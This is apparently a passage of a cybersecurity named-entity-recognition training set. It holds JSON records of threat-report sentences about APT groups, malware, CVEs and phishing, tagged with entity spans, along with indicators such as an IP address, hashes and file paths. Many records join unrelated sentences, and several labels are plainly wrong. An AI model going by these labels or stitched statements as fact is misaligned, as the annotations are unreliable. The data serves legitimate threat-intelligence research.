Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities . The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system .", "spans": {"MALWARE: HenBox": [[16, 22]], "SYSTEM: Android": [[50, 57]], "THREAT_ACTOR: APT-C-09": [[138, 146]], "THREAT_ACTOR: Bitter": [[149, 155]], "THREAT_ACTOR: Donot": [[160, 165]], "THREAT_ACTOR: APT18": [[302, 307]], "MALWARE: hcdLoader RAT": [[327, 340]], "SYSTEM: Windows": [[363, 370]]}, "info": {"id": "cyberner_stix_train_000438", "source": "cyberner_stix_train"}} {"text": "The Lookout Threat Intelligence team is increasingly seeing the same tradecraft , tactics , and procedures that APT-C-23 favors being used by other actors . Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey . In one instance , a large U.S. company was attacked in the same month a Middle Eastern company it co-owns was also compromised . 
The techniques leveraged during the incident suggest a growing maturity of Russia ’s offensive OT arsenal , including an ability to recognize novel OT threat vectors , develop new capabilities , and leverage different types of OT infrastructure to execute attacks .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[4, 31]], "MALWARE: APT-C-23": [[112, 120]], "THREAT_ACTOR: Lazarus": [[157, 164]], "ORGANIZATION: banks": [[278, 283]]}, "info": {"id": "cyberner_stix_train_000439", "source": "cyberner_stix_train"}} {"text": "The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file , modified it to see the content ( misspelling the variable name along the way ) post-decoding , and uploaded it to see what it did in a sandbox .", "spans": {}, "info": {"id": "cyberner_stix_train_000440", "source": "cyberner_stix_train"}} {"text": "This version adds one significant class — it requests DEVICE_ADMIN privileges . Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim . WATERSPOUT : APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted .", "spans": {"TOOL: Trochilus": [[86, 95]], "TOOL: RAT": [[107, 110]], "MALWARE: WATERSPOUT": [[308, 318]], "THREAT_ACTOR: APT29": [[321, 326]]}, "info": {"id": "cyberner_stix_train_000441", "source": "cyberner_stix_train"}} {"text": "The impacted versions of the UPX library are 3.94 , 3.93 , and 3.92 .", "spans": {"TOOL: UPX": [[29, 32]]}, "info": {"id": "cyberner_stix_train_000442", "source": "cyberner_stix_train"}} {"text": "EVENTBOT INFRASTRUCTURE By mapping the C2 servers , a clear , repeated pattern emerges based on the specific URL gate_cb8a5aea1ab302f0_c . 
The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 .", "spans": {"MALWARE: EVENTBOT": [[0, 8]], "MALWARE: MSIL dropper": [[187, 199]], "MALWARE: Javascript (JS) dropper": [[254, 277]], "THREAT_ACTOR: threat groups": [[492, 505]], "THREAT_ACTOR: Oilrig1": [[516, 523]], "THREAT_ACTOR: CopyKittens2": [[528, 540]]}, "info": {"id": "cyberner_stix_train_000443", "source": "cyberner_stix_train"}} {"text": "At the time of writing this research , four versions of the EventBot malware were observed : Version 0.0.0.1 , 0.0.0.2 , and 0.3.0.1 and 0.4.0.1 . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload .", "spans": {"MALWARE: EventBot": [[60, 68]], "MALWARE: sample": [[163, 169]], "ORGANIZATION: Unit 42": [[308, 315]], "MALWARE: Emissary Trojan": [[374, 389]]}, "info": {"id": "cyberner_stix_train_000444", "source": "cyberner_stix_train"}} {"text": "We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . 
The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": {"THREAT_ACTOR: APT10": [[15, 20]], "FILEPATH: exploit document": [[184, 200]], "MALWARE: KeyBoy": [[225, 231]], "FILEPATH: decoy document": [[258, 272]], "VULNERABILITY: exploit": [[315, 322]]}, "info": {"id": "cyberner_stix_train_000445", "source": "cyberner_stix_train"}} {"text": "In some versions , the server would only return valid responses several days after the apps were submitted . In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor . The hook installed by ZxShell implements one of its filtering routine . A full report describing the timeline of DUCKTAIL ’s activities , a detailed analysis of its malware component , and appendices containing indicators of compromise , Yara detection rules , metadata , and MITRE ATT&CK techniques can be downloaded from a link on this page .", "spans": {"TOOL: software updates": [[147, 163]], "TOOL: ShadowPad backdoor": [[288, 306]], "MALWARE: ZxShell": [[331, 338]], "MALWARE: malware": [[474, 481]], "ORGANIZATION: Yara": [[547, 551]], "ORGANIZATION: MITRE ATT&CK": [[585, 597]]}, "info": {"id": "cyberner_stix_train_000446", "source": "cyberner_stix_train"}} {"text": "specifically CVE-2018-0798 , before downloading subsequent payloads . 
Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations – not destructive attacks or fraud .", "spans": {"VULNERABILITY: CVE-2018-0798": [[13, 26]], "THREAT_ACTOR: Bahamut": [[81, 88]]}, "info": {"id": "cyberner_stix_train_000447", "source": "cyberner_stix_train"}} {"text": "spear phishing : 69.87.223.26 .", "spans": {"IP_ADDRESS: 69.87.223.26": [[17, 29]]}, "info": {"id": "cyberner_stix_train_000448", "source": "cyberner_stix_train"}} {"text": "For the hardware virtualization check , the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments . This particular OceanLotus malware loader attempts to imitate McAfee ’s McVsoCfg DLL and expects to be side-loaded by the legitimate \" On Demand Scanner \" executable . Seven of the vulnerabilities included in today ’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10 .", "spans": {"THREAT_ACTOR: APT32": [[177, 182]], "THREAT_ACTOR: OceanLotus Group": [[203, 219]], "ORGANIZATION: foreign corporations": [[235, 255]], "ORGANIZATION: governments": [[264, 275]], "THREAT_ACTOR: OceanLotus": [[294, 304]], "TOOL: McVsoCfg DLL": [[350, 362]]}, "info": {"id": "cyberner_stix_train_000449", "source": "cyberner_stix_train"}} {"text": "In actual fact , the Trojan does not block anything and the phone can be used without any problems . The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" . 
Here is a short list of the types of tools included with ZxShell : A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": {"THREAT_ACTOR: WorldCupSec": [[166, 177]], "THREAT_ACTOR: TadjMakhal": [[184, 194]], "THREAT_ACTOR: Wipbot": [[201, 207]], "THREAT_ACTOR: Tavdig": [[215, 221]], "MALWARE: ZxShell": [[283, 290]], "ORGANIZATION: Hack520": [[345, 352]]}, "info": {"id": "cyberner_stix_train_000450", "source": "cyberner_stix_train"}} {"text": "In the past , we ’ve seen groups such as Equation and Flame use malware to steal data from air-gapped networks .", "spans": {"THREAT_ACTOR: Equation": [[41, 49]], "THREAT_ACTOR: Flame": [[54, 59]]}, "info": {"id": "cyberner_stix_train_000451", "source": "cyberner_stix_train"}} {"text": "The “ Init ” export establishes connection to port 80 of a C2 server using Wininet API .", "spans": {"TOOL: C2": [[59, 61]], "TOOL: Wininet": [[75, 82]]}, "info": {"id": "cyberner_stix_train_000452", "source": "cyberner_stix_train"}} {"text": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Blaster.lnk :", "spans": {"FILEPATH: C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Blaster.lnk": [[0, 87]]}, "info": {"id": "cyberner_stix_train_000453", "source": "cyberner_stix_train"}} {"text": "Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably . 
In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger .", "spans": {"THREAT_ACTOR: Bahamut": [[0, 7]], "TOOL: Android malware": [[69, 84]], "THREAT_ACTOR: TG-3390": [[216, 223]], "ORGANIZATION: Microsoft": [[266, 275]], "MALWARE: custom backdoor": [[301, 316]], "MALWARE: credential logger": [[321, 338]]}, "info": {"id": "cyberner_stix_train_000454", "source": "cyberner_stix_train"}} {"text": "Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": {"TOOL: Lurk": [[0, 4]], "FILEPATH: Careto": [[228, 234]]}, "info": {"id": "cyberner_stix_train_000455", "source": "cyberner_stix_train"}} {"text": "RuMMS Samples , C2 , Hosting Sites , Infections and Timeline In total we captured 297 RuMMS samples , all of which attempt to contact an initial C2 server that we extracted from the app package . The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented . We already published a couple of articles about ROKRAT ( here , here , here and here ) where another unrelated actor , Group123 , made the same choice but with different providers . 
Other interesting anomalies in June include 47 attacks on the Manufacturing industry ( which usually averages around 20 attacks a month ) and notable increases in attacks on Switzerland ( 14 ) and Brazil ( 13 ) , both of which are normally attacked only two or three times a month .", "spans": {"MALWARE: RuMMS": [[0, 5], [86, 91]], "TOOL: script-based backdoors": [[207, 229]], "THREAT_ACTOR: OilRig group": [[264, 276]], "MALWARE: ROKRAT": [[360, 366]], "THREAT_ACTOR: Group123": [[431, 439]], "ORGANIZATION: Manufacturing industry": [[556, 578]]}, "info": {"id": "cyberner_stix_train_000456", "source": "cyberner_stix_train"}} {"text": "Application Recording — Stealing OTPs and TANs The feature that makes TrickMo different from standard SMS stealers is its unique ability to record the screen when targeted apps are running . The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal . the group 's targets include an organization in Sweden .", "spans": {"MALWARE: TrickMo": [[70, 77]], "THREAT_ACTOR: attacker’s": [[246, 256]]}, "info": {"id": "cyberner_stix_train_000457", "source": "cyberner_stix_train"}} {"text": "In 2016 , the Mirai botnet was discovered by the malware research group MalwareMustDie .", "spans": {"TOOL: Mirai botnet": [[14, 26]], "ORGANIZATION: MalwareMustDie": [[72, 86]]}, "info": {"id": "cyberner_stix_train_000458", "source": "cyberner_stix_train"}} {"text": "It helps the attacker find out which banks the owner of the smartphone calls – the Trojan receives a list of bank phone numbers from its C & C server . The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case . Winnti : hpqhvind.exe . 
The configuration contains two C2 servers that are prefixed with a protocol identifier .", "spans": {"THREAT_ACTOR: Turla 's operation": [[250, 268]], "TOOL: Skipper": [[304, 311]], "THREAT_ACTOR: Winnti": [[455, 461]], "FILEPATH: hpqhvind.exe": [[464, 476]], "SYSTEM: C2 servers": [[510, 520]]}, "info": {"id": "cyberner_stix_train_000459", "source": "cyberner_stix_train"}} {"text": "In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke .", "spans": {"MALWARE: CozyDuke": [[64, 72]], "MALWARE: CloudDuke": [[77, 86]], "THREAT_ACTOR: Dukes": [[93, 98]], "MALWARE: CosmicDuke": [[166, 176]]}, "info": {"id": "cyberner_stix_train_000460", "source": "cyberner_stix_train"}} {"text": "Suckfly made its malware difficult to analyze to prevent their operations from being detected .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_000461", "source": "cyberner_stix_train"}} {"text": "We also registered one episode of mobile malware spreading via a third-party botnet . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 . In the case where the parent process is hpqhvind.exe , this sequence of bytes is present at this exact location and the malicious DLL will proceed to patch the parent process in memory . Sometimes this was a high profile , legitimate site such as ‘ diplomacy.pl ’ hosting a ZIP archive .", "spans": {"TOOL: MikroTik": [[230, 238]], "FILEPATH: hpqhvind.exe": [[338, 350]], "TOOL: DLL": [[428, 431]]}, "info": {"id": "cyberner_stix_train_000462", "source": "cyberner_stix_train"}} {"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . 
Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc .", "spans": {"MALWARE: Neptun": [[0, 6]], "THREAT_ACTOR: attackers": [[108, 117]], "ORGANIZATION: Group-IB": [[120, 128]], "MALWARE: Trojan": [[196, 202]], "MALWARE: mail tracking websites": [[205, 227]], "MALWARE: news portals": [[230, 242]], "MALWARE: electronic books": [[245, 261]], "MALWARE: computer graphics resources": [[264, 291]], "MALWARE: music portals": [[294, 307]]}, "info": {"id": "cyberner_stix_train_000463", "source": "cyberner_stix_train"}} {"text": "These attacks deliver the Spark and Pierogi backdoors for politically-driven cyber espionage operations .", "spans": {"MALWARE: Spark": [[26, 31]], "MALWARE: Pierogi backdoors": [[36, 53]]}, "info": {"id": "cyberner_stix_train_000464", "source": "cyberner_stix_train"}} {"text": "To lure the victims to download the malware , threat actors use SMS phishing – sending a short SMS message containing a malicious URL to the potential victims . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals . Thanks to this exploit ( Remote Code Execution exploit ) the user interaction is not required , in fact the “ enable macro ” button is not shown . 
Criminals are also using malvertising via search engines to lure potential victims in .", "spans": {"THREAT_ACTOR: espionage": [[228, 237]], "ORGANIZATION: economic": [[242, 250]], "THREAT_ACTOR: activity groups": [[277, 292]], "ORGANIZATION: specific individuals": [[326, 346]], "VULNERABILITY: Remote Code Execution": [[374, 395]], "TOOL: macro": [[466, 471]], "THREAT_ACTOR: Criminals": [[496, 505]], "THREAT_ACTOR: malvertising via search engines to lure potential victims in": [[521, 581]]}, "info": {"id": "cyberner_stix_train_000465", "source": "cyberner_stix_train"}} {"text": "There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants , as well other Trojans such as MobileOrder , Psylo , and CallMe . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": {"TOOL: FakeM": [[81, 86]], "TOOL: MobileOrder": [[128, 139]], "TOOL: Psylo": [[142, 147]], "TOOL: CallMe": [[154, 160]], "THREAT_ACTOR: APT32": [[185, 190]], "THREAT_ACTOR: OceanLotus Group": [[211, 227]], "ORGANIZATION: foreign corporations": [[243, 263]], "ORGANIZATION: foreign governments": [[294, 313]], "ORGANIZATION: journalists": [[316, 327]], "ORGANIZATION: dissidents": [[345, 355]]}, "info": {"id": "cyberner_stix_train_000466", "source": "cyberner_stix_train"}} {"text": "We determined that this chunk of data contains an array of opcode instructions ready to be interpreted by a custom virtual machine program ( from this point on referenced generically as “ VM ” ) implemented by FinFisher authors . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan . That C&C server served the latest version of the MUI files encrypted with a static RC5 key . 
A recent report from the United Kingdom ’s National CyberSecurity Center ( NCSC ) highlights how the accessibility of these tools “ lowers the barrier to entry to state and non - state actors in obtaining capability and intelligence . ”", "spans": {"MALWARE: FinFisher": [[210, 219]], "THREAT_ACTOR: APT threat actors": [[230, 247]], "ORGANIZATION: diplomat": [[298, 306]], "TOOL: RC5": [[510, 513]], "ORGANIZATION: United Kingdom ’s National CyberSecurity Center ( NCSC )": [[545, 601]]}, "info": {"id": "cyberner_stix_train_000467", "source": "cyberner_stix_train"}} {"text": "Why would OurMine want to target WikiLeaks . Silence 's successful attacks currently have been limited to the CIS and Eastern European countries .", "spans": {"THREAT_ACTOR: OurMine": [[10, 17]], "ORGANIZATION: WikiLeaks": [[33, 42]]}, "info": {"id": "cyberner_stix_train_000468", "source": "cyberner_stix_train"}} {"text": "Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release . Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": {"TOOL: Ryuk": [[36, 40], [78, 82]], "TOOL: Hermes ransomware": [[45, 62]], "TOOL: Hermes": [[104, 110]], "ORGANIZATION: CrowdStrike": [[247, 258]]}, "info": {"id": "cyberner_stix_train_000469", "source": "cyberner_stix_train"}} {"text": "Enforce secure network authentication , where possible .", "spans": {}, "info": {"id": "cyberner_stix_train_000470", "source": "cyberner_stix_train"}} {"text": "( Please note this is a different app and not the same as the one being spread by hxxp : //tiny [ . Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware . The following is an example Python function to decode these strings . 
libxselinux.old : 7f4764c6e6dabd262341fd23a9b105a3 dc96d0f02151e702ef764bbc234d1e73d2811416 ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23 .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[100, 115]], "TOOL: malware": [[192, 199]], "TOOL: Python": [[230, 236]], "FILEPATH: libxselinux.old": [[272, 287]], "FILEPATH: 7f4764c6e6dabd262341fd23a9b105a3": [[290, 322]], "FILEPATH: dc96d0f02151e702ef764bbc234d1e73d2811416": [[323, 363]], "FILEPATH: ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23": [[364, 428]]}, "info": {"id": "cyberner_stix_train_000471", "source": "cyberner_stix_train"}} {"text": "The members of the group use a variety of tools , including CCleaner , on a daily basis to effectively remove any evidence of their operations . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": {"THREAT_ACTOR: group": [[19, 24]], "TOOL: CCleaner": [[60, 68]], "ORGANIZATION: French diplomat": [[179, 194]], "THREAT_ACTOR: actors": [[260, 266]]}, "info": {"id": "cyberner_stix_train_000472", "source": "cyberner_stix_train"}} {"text": "It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . 
Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"THREAT_ACTOR: Patchwork": [[128, 137]], "VULNERABILITY: CVE-2015-1641": [[307, 320]], "VULNERABILITY: CVE-2017-11882": [[325, 339]], "THREAT_ACTOR: Attackers": [[342, 351]], "TOOL: C&C": [[400, 403]], "ORGANIZATION: oil": [[536, 539]], "ORGANIZATION: gas": [[542, 545]], "ORGANIZATION: petrochemical companies": [[552, 575]], "ORGANIZATION: executives": [[605, 615]]}, "info": {"id": "cyberner_stix_train_000473", "source": "cyberner_stix_train"}} {"text": "The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security . 
Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: mssecsvc2.0": [[50, 61]], "ORGANIZATION: Symantec": [[145, 153]], "THREAT_ACTOR: Lazarus": [[180, 187]], "ORGANIZATION: customers": [[225, 234]]}, "info": {"id": "cyberner_stix_train_000474", "source": "cyberner_stix_train"}} {"text": "C:\\Users\\[user name]\\Downloads\\Telegram Desktop\\UnionCryptoTraderSetup.exe .", "spans": {"FILEPATH: Desktop\\UnionCryptoTraderSetup.exe": [[40, 74]]}, "info": {"id": "cyberner_stix_train_000475", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed TG-3390 actors using tools that are favored by multiple threat groups :", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[30, 37]]}, "info": {"id": "cyberner_stix_train_000476", "source": "cyberner_stix_train"}} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . 
The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "ORGANIZATION: consumer": [[76, 84]], "TOOL: Carberp": [[176, 183]], "MALWARE: decoy documents": [[190, 205]], "TOOL: InPage": [[218, 224]], "VULNERABILITY: exploits": [[225, 233]], "ORGANIZATION: politically": [[276, 287]], "ORGANIZATION: militarily": [[291, 301]]}, "info": {"id": "cyberner_stix_train_000477", "source": "cyberner_stix_train"}} {"text": "FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": {"THREAT_ACTOR: FANCY BEAR": [[0, 10]], "THREAT_ACTOR: Sofacy": [[27, 33]], "THREAT_ACTOR: APT 28": [[37, 43]]}, "info": {"id": "cyberner_stix_train_000478", "source": "cyberner_stix_train"}} {"text": "Timebombs , Dynamic Code Loading and Reflection If Google Bouncer was not detected , the application starts a time bomb which initiates the malicious flow only after 20 seconds and will run every 2 hours . Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . 
But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China — so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China .", "spans": {"SYSTEM: Google Bouncer": [[51, 65]], "VULNERABILITY: CVE-2017-10271": [[316, 330]], "TOOL: PowerShell": [[344, 354]], "MALWARE: Poison Ivy": [[492, 502]], "MALWARE: PIVY": [[505, 509], [591, 595]], "MALWARE: RAT": [[516, 519]], "THREAT_ACTOR: actors": [[557, 563]]}, "info": {"id": "cyberner_stix_train_000479", "source": "cyberner_stix_train"}} {"text": "German Bundestag & Political Parties :", "spans": {"ORGANIZATION: German Bundestag & Political Parties": [[0, 36]]}, "info": {"id": "cyberner_stix_train_000480", "source": "cyberner_stix_train"}} {"text": "With the ability to hide its icon from the launcher and hijack popular existing apps on a device , there are endless possibilities to harm a user ’ s digital even physical security . Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems . They explain why the company has chosen to book that particular hotel . ( Vox , USA Today )", "spans": {"ORGANIZATION: Group-IB": [[183, 191]], "ORGANIZATION: financial institutions": [[241, 263]], "TOOL: Corkow malware": [[313, 327]], "ORGANIZATION: Vox": [[453, 456]], "ORGANIZATION: USA Today": [[459, 468]]}, "info": {"id": "cyberner_stix_train_000481", "source": "cyberner_stix_train"}} {"text": "BLOCKER_BANKING_START – display phishing HTML page for entry of bank card details . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": {"MALWARE: Microsoft Word attachment": [[164, 189]], "VULNERABILITY: CVE-2017-0199": [[222, 235]], "TOOL: ZeroT Trojan": [[250, 262]], "TOOL: PlugX Remote Access Trojan": [[294, 320]], "TOOL: RAT": [[323, 326]], "ORGANIZATION: Symantec": [[331, 339]], "THREAT_ACTOR: Leafminer": [[366, 375]], "VULNERABILITY: Heartbleed vulnerability": [[392, 416]], "VULNERABILITY: CVE-2014-0160": [[419, 432]]}, "info": {"id": "cyberner_stix_train_000482", "source": "cyberner_stix_train"}} {"text": "Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM – and said that the data heist involved 6 terabytes of sensitive data .", "spans": {"THREAT_ACTOR: APT33": [[44, 49]], "ORGANIZATION: military": [[167, 175]], "ORGANIZATION: commercial": [[180, 190]], "ORGANIZATION: Citrix'": [[260, 267]]}, "info": {"id": "cyberner_stix_train_000483", "source": "cyberner_stix_train"}} {"text": "This data shows a distinct concentration of infected devices beaconing from Gaza , Palestine . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country . The domain names and IP addresses together comprise APT1 ’s command and control framework which they manage in concert to camouflage their true origin from their English speaking targets . 
There are a few reasons why attackers may opt to pay for an as - a - service malware tool for their chosen campaign : • As - a - service saves attackers time .", "spans": {"TOOL: GozNym": [[117, 123]], "ORGANIZATION: banks": [[167, 172]], "ORGANIZATION: community banks": [[264, 279]], "ORGANIZATION: email service providers": [[284, 307]], "THREAT_ACTOR: APT1": [[394, 398]], "TOOL: command and control": [[402, 421]], "THREAT_ACTOR: attackers": [[559, 568]], "TOOL: an as - a - service malware tool": [[588, 620]]}, "info": {"id": "cyberner_stix_train_000484", "source": "cyberner_stix_train"}} {"text": "Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to “ the TRITON actor ” ) describe the same phenomena , yet at the same time appear different .", "spans": {"THREAT_ACTOR: XENOTIME": [[113, 121]], "THREAT_ACTOR: TEMP.Veles": [[126, 136]], "MALWARE: TRITON": [[174, 180]]}, "info": {"id": "cyberner_stix_train_000485", "source": "cyberner_stix_train"}} {"text": "Communication with C & C Although Asacub ’ s capabilities gradually evolved , its network behavior and method of communication with the command-and-control ( C & C ) server changed little . Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals . We will continue to observe the group ’s activities as they target industries from the United States and Europe . 
The purpose of these socially engineered lures is to convince the targeted users to enable macros , thereby allowing the execution chain to commence .", "spans": {"MALWARE: Asacub": [[34, 40]], "TOOL: SWCs": [[224, 228]], "THREAT_ACTOR: TG-3390": [[231, 238]]}, "info": {"id": "cyberner_stix_train_000486", "source": "cyberner_stix_train"}} {"text": "Installation process with administrative privilege This installation method is more interesting because it reveals how the malware tries to achieve stealthier persistence on the machine . Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . Implementation of an additional anti-analysis check that compares the name of the parent process to a string stored in an encrypted resource . The opportunities for governments and law enforcement to use spyware as part of legal investigations led to the development of commercial spyware .", "spans": {"ORGANIZATION: social media": [[252, 264]], "ORGANIZATION: governments": [[512, 523]], "ORGANIZATION: law enforcement": [[528, 543]], "TOOL: commercial spyware": [[617, 635]]}, "info": {"id": "cyberner_stix_train_000487", "source": "cyberner_stix_train"}} {"text": "Cannon gathers system information and saves it to a file named ini .", "spans": {"MALWARE: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_train_000488", "source": "cyberner_stix_train"}} {"text": "In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group . Silence attacked financial organisations in the UK . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . 
On 24 March 2019 , Silence.ProxyBot MD5 2fe01a04d6beef14555b2cf9a717615c ) was uploaded to VirusTotal from an IP address in Sri Lanka . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk . On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 .", "spans": {"ORGANIZATION: Novetta": [[9, 16]], "THREAT_ACTOR: Winnti": [[54, 60]], "THREAT_ACTOR: Axiom": [[98, 103]], "THREAT_ACTOR: Silence": [[112, 119], [165, 172], [931, 938], [1110, 1117], [1319, 1326], [1511, 1518]], "ORGANIZATION: financial": [[129, 138], [717, 726]], "THREAT_ACTOR: attackers": [[416, 425]], "ORGANIZATION: banks": [[511, 516]], "MALWARE: Silence.ProxyBot": [[538, 554]], "FILEPATH: 2fe01a04d6beef14555b2cf9a717615c": [[559, 591]], "TOOL: VirusTotal": [[610, 620]], "TOOL: emails": [[699, 705], [1537, 1543]], "ORGANIZATION: Group-IB": [[777, 785]], "ORGANIZATION: bank": [[988, 992]], "MALWARE: Atmosphere": [[1075, 1085]], "MALWARE: Trojan": [[1090, 1096]], "FILEPATH: xfs-disp.exe": [[1183, 1195]], "ORGANIZATION: Bank": [[1250, 1254]], "THREAT_ACTOR: Silence:": [[1276, 1284]], "ORGANIZATION: Financial": [[1617, 1626]]}, "info": {"id": 
